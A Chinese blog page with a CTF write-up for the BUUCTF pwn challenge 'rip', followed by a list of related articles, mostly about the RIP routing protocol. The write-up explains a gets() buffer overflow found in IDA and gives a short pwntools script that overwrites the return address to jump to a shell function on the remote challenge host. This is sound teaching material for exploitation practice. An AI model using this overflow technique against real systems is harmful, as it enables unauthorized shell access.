第二题——rip

最新推荐文章于 2022-11-17 02:54:43 发布
最新推荐文章于 2022-11-17 02:54:43 发布
阅读量250 收藏 1
点赞数
分类专栏: CTF-PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/117034038
版权
题目地址:https://buuoj.cn/challenges

解题思路

第一步:下载题目给出的pwn1文件

在这里插入图片描述

第二步:使用IDA打开pwn1文件

  1. 查看main函数发现gets函数对于输入没有限制
    在这里插入图片描述
  2. 汇编不好看可以按下f5查看伪代码
    在这里插入图片描述
  3. 在fun函数看到了/bin/sh命令
    在这里插入图片描述

第三步:获取flag

  1. 思路:由于gets函数没有限制输入,可以利用缓冲区溢出,将缓冲区填满后跳转到fun函数处,获取shell,以达到获取flag的目的
  2. 由于gets函数将获取到的值赋值给s,双击查看s定义了多少空间
    在这里插入图片描述
    在这里插入图片描述
    1-f占了15位,db 8 dup (?)占了8位,所以s一共15+8=23位
  3. 查看fun函数的开始地址为:0x401186
    在这里插入图片描述
  4. 编写exp
exp编写步骤:
from pwn import * #引入pwn库
p = remote(ip, port) # 输入对应的ip地址和端口号来连接其他主机的服务
... # 输入payload来进行操作以拿到程序的shell payload一般等于 偏移量 + 地址
p.interactive() # 反弹shell
结果:保存为1.py
from pwn import *
p = remote('node3.buuoj.cn', 29021)
payload = b'a' * 23 + p64(0x401186 + 1)//+1为了保证堆栈平衡
p.sendline(payload)
p.interactive()
  1. 使用python3 1.py执行1.py,输入cat flag获取到flag
    在这里插入图片描述

获取flag解法二:

想学习安全的小白
关注
专栏目录
HCIA第五天——RIP动态路由综合实验
weixin_58163202的博客
12-09 662
1、划分IP地址 192.168.1.0/24——将该网段划分4个骨干网段 (1)192.168.1.0/26——划分两个环回(r1) 192.168.1.1/27 192.168.1.33/27 (2)192.168.1.64/26——划分两个环回(r2) 192.168.1.65/27 192.168.1.97/27 (3)192.168.1.128/26 (4)192.168.1.192/26 分配IP地址 填写动态路由表(RIP协议),并宣告接口 [R1]rip ..
eNSP学习——RIP故障处理
最新发布
TXFBAP的博客
06-09 1262
掌握RIP故障的产生原因; 掌握RIP故障诊断流程; 掌握RIP故障处理步骤; 掌握RIP故障排除的常用命令。
RIP协议复习
weixin_63414323的博客
03-20 3174
知识点一:Bellman-Ford算法 1,AR2发送2.0网段的信息给AR1,如果,AR1本身并不存在该网段的路由信息,则将直接刷新到本地的路由表中。 Destination/Mask Proto Pre Cost Flags NextHop Interface 2.2.2.0/24 RIP 100 1 D 12.0.0.2 ...
IDA反汇编之栈帧例释
ComputerInBook的专栏
09-13 2310
使用IDA进行反汇编分析
RIP协议手动配置小型园区网
Re1_zf的博客
11-17 796
基于RIP协议配置的小型园区网,组网工程小作业
BUUCTF (PWN) RIP详细分析
热门推荐
qy201706的博客
04-08 1万+
很简单的栈溢出,不过对于栈溢出具体过程不理解的会卡的很惨; 由于初学嘛,就看了网上的wp,好像都是之前版本的,现在用就不太对,可能我入坑BUUCTF比较晚,现在用的都是运行在Ubuntu18上的,故需要考虑堆栈平衡~~
C语言四层指针,C语言学习之七——指针_4_函数
weixin_42151305的博客
05-22 251
!!!注意:因为简书的显示格式缘故,所以“ * ”显示会出现问,可能有些星号由于疏忽未改动格式,造成没有显示,请多多包含,如有错误,请留言或联系本人更正,谢谢!指向函数的指针简介函数指针变量:指的是存储一个指向函数的指针的变量。因为函数在编译时会被分配一个入口地址,而这个入口地址即为函数的指针。见例1.//例1/#includeint max(int x, int y){int z;if( x ...
思科网络实验室路由——RIP路由协议基本配置
10-11
### 思科网络实验室路由——RIP路由协议基本配置 #### 实验背景及目标 本实验旨在通过模拟一个具体的校园网络环境,使学习者能够掌握RIP路由协议的基本配置方法。该实验设置了一个由两个地理区域组成的校园网络,...
计算机网络课后——第五章 互联网的网络层{129}
y44444444444的博客
03-14 1892
非 标准答案,期待指正。 1.请简述IP层报文交付的特点。 不可靠的无连接数据报机制,不做验证,不发确认,也不保证分组的正确顺序。 2.IP地址分为哪几类?如何表示?各有什么特点? A类:网络号字段占一个字节,该字段的第一位固定为0。 B类:网络号字段有两个字节,前面两位(10)固定。 C类:有三个字节的网络号字段,最前面的三位是(110)。 D类:为多播地址,最前面是(1110)。 E类:保留今后使用,前面(11110)。 3.某学校有3个系需要接入教育科研网,公用一个C类地址(210.45.240.0/
CCNA面试——网络工程师
07-29
### CCNA面试详解:网络工程师必知知识点 #### 三层交换与路由的区别 三层交换机与路由器在功能上有着显著的相似性,两者都能基于IP地址进行数据包的转发,这种能力使得它们在概念上趋于一致。然而,两者在设计...
CTF buuoj pwn-----第2:rip
bing_Max的博客
08-28 2872
CTF buuoj pwn-----第2:rip 记录一下pwn的过程 同第1一样,新手学习日记,流水线记录. 打开目,连接靶机,下载文件’ript’ 1. 首先checkesc ,检测文件的保护机制. checksec在下载好pwntools后就有 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-lit
RIP引入外部路由配置示例
weixin_34242331的博客
11-16 1505
实验内容: R2配置RIP路由协议进程2;R3配置RIP路由协议进程2和进程3;R4配置路由协议RIP进程3.现使PC1可以访问Pc2,且不能访问PC3. 实验拓扑: 实验配置: [R2]inter g0/0/0 [R2-GigabitEthernet0/0/0]ip add 1.1.1.1 24 [R2-GigabitEthernet0/0/1]ip...
【ORACLE】dbms_cloud包使用的各大云厂商对象存储的username及password位置
DarkAthena的博客
11-01 604
前言 之前没有万事达和visa卡,想测试oracle各种功能,比如dbms_cloud,遇到了点麻烦,当天就申请了万事达卡,结果卡还没到,第二天就用京东云和腾讯云跑通了。 https://www.darkathena.top/archives/dbmscloudjdcloudoss https://www.darkathena.top/archives/dbmscloudrelated 然后今天我的万事达卡到了,赶紧去银行把卡开了,然后马不停蹄地赶回家,直接就把国外三大云服务厂商的免费套餐都申请了 然
第十七节:动态路由协议之RIP
BigPenguin的博客
12-16 603
第十七节:动态路由协议之RIP 文章目录前言:衡量动态路由协议好坏的标准:A:动态路由协议:RIP(100);B:距离矢量型的路由环路(RIP)C:RIP的计时器D:RIPv1 和 RIPv2 区别和报头形式E:RIPv1中的不连续子网问F:RIP的验证G:RIP v1 和 v2 的区别H:引入外部路由I:附加度量值 前言:衡量动态路由协议好坏的标准:   1:正确性 :能够正确找到最优路由,并且不会产生回路;   2:快收敛 :拓扑结构发生变化,能快速学习网络变化的能力(学习速度快慢),也叫收敛时间;
C语言系列(四)指针概念的理解
stromxu 的专栏
08-22 1万+
转载请标明出处: http://blog.csdn.net/u011974987/article/details/52270018; 本文出自:【XuHao的博客】 前言最近真的是忙的不可开交,公司一直给安排任务,连学习和写笔记的时间都没有了,落下好几次课的笔记都没有写,所以我抽空把目前的进度给追上来,不然会越落越多。加油吧~(感觉身体都要被掏空了) 指针我们通过指针,可以简化一些 C 编程
BUUCTF|PWN-pwn1_sctf_2016-WP
l2645470582_的博客
07-29 734
1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec pwn1_sctf_2016 3、该文件是62为文件,我们用32为IDA打开该文件 3.1、shift+f12查看关键字符串 3.2、双击关键字符串,ctrl+x查看cat flag.txt地址 3.3、F5进入main函数反编译代码区 3.4、看到有个vuln()关键函数,双击进去 3.5、我们看见关键字变量名溢出,双击查看 s地址: r地址: ...
接上文距离向量算法(例
qq_38855717的博客
05-01 5465
假定网络中的路由器B的路由表有如下的项目(这三列分别表示“目的网络”、“距离”和“下一跳”路由器):N1 7 AN2 2 CN6 8 FN8 4 EN9 4 F现在B收到从C发来的路由信息(这两列分别表示“目的网络”和“距离”):N2 4N3 8N6 4N8 3N9 5试求出路由器B更新后的路由表(详细说明每...
ripPwn
qq_45913417的博客
11-18 2411
IDA中SHIFT+F12: 漏洞点+后门已获得,开启乱杀之路: from pwn import * context.os = 'linux' context.arch = 'amd64' context.log_level = 'debug' # io = process('./pwn1') io = remote('redirect.do-not-trust.hacking.run', 10368) elf = ELF('./pwn1') // 由于该目没有清除缓冲区,导致recv接收不到...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值